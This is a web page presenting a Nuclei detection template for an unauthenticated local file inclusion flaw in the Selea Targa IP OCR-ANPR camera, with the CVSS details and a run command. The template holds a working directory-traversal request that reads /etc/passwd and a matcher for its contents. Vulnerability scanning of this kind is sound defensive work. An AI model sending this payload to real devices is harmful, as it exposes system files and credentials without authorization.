Skip to content

Selea Targa IP OCR-ANPR Camera - Local File Inclusion

ID: targa-camera-lfi

Severity: high

Author: gy741

Tags: targa,lfi,iot,camera,selea

Selea Targa IP OCR-ANPR camera suffers from an unauthenticated local file inclusion vulnerability because input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker in disclosing clear-text credentials.

id: targa-camera-lfi
info:
name: Selea Targa IP OCR-ANPR Camera - Local File Inclusion
author: gy741
severity: high
description: Selea Targa IP OCR-ANPR camera suffers from an unauthenticated local file inclusion vulnerability because input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker in disclosing clear-text credentials.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
metadata:
max-request: 1
tags: targa,lfi,iot,camera,selea
http:
- method: GET
path:
- "{{BaseURL}}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100a85d8bdffa0da77d2c55bf304c526451157e1736e71ecf057c720cea437dd8b1022100cf180c93512b40fec37246d85182afb5352fd374cb84f945d80ea56470909f3a:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/iot/targa-camera-lfi.yaml"

View on Github